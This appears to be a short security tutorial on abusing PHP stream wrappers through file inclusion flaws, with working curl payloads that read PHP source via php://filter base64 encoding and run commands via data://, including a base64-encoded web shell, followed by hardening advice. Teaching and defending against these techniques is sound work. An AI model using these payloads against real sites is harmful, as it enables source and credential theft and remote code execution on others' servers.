PHP Wrappers: File Inclusion & Code Execution

Published on March 13, 2025

PHP includes a set of protocol wrappers that allow interaction with different stream resources, such as local and remote filesystems. These wrappers can be leveraged in web applications to bypass security filters or execute malicious code through **File Inclusion vulnerabilities**. This article focuses on two powerful wrappers: php://filter and data://.

Using php://filter for File Inclusion

The php://filter wrapper enables file inclusion while applying stream filters, such as **base64 encoding**. This allows an attacker to read PHP source files without executing them, which can reveal sensitive information.

For example, using php://filter/resource=admin.php as an LFI payload:

curl http://target-site.com/index.php?page=php://filter/resource=admin.php

The output will include visible HTML, but any PHP code will be executed server-side and not shown. To bypass this and retrieve raw PHP content, we can encode the output in base64: 

curl http://target-site.com/index.php?page=php://filter/convert.base64-encode/resource=admin.php

The response will contain base64-encoded data, which we can decode using: 

echo "BASE64_ENCODED_DATA" | base64 -d

This technique can expose database credentials, API keys, or even server configurations.

Executing Code with data://

The data:// wrapper allows embedding raw data into an application as a resource. When combined with LFI vulnerabilities, it can be used to execute arbitrary PHP code.

For example, injecting a command execution payload:

curl "http://target-site.com/index.php?page=data://text/plain,<?php system('ls'); ?>"

If successful, this will execute the ls command, listing directory contents.

When security mechanisms block direct PHP execution, encoding the payload in base64 can help: 

echo -n '<?php system($_GET["cmd"]);?>' | base64

Then, include it in the request: 

curl "http://target-site.com/index.php?page=data://text/plain;base64,BASE64_ENCODED_PAYLOAD&cmd=id"

This method enables remote command execution, but it requires allow_url_include to be enabled in the PHP configuration.

Mitigations & Hardening

  • Disable allow_url_include and allow_url_fopen in php.ini.
  • Use strict input validation and whitelisting for file inclusion parameters.
  • Ensure files outside the web root are not accessible via inclusion.
  • Monitor web server logs for suspicious usage of PHP wrappers.

Understanding and mitigating these risks is crucial for securing PHP-based web applications.

Related Topics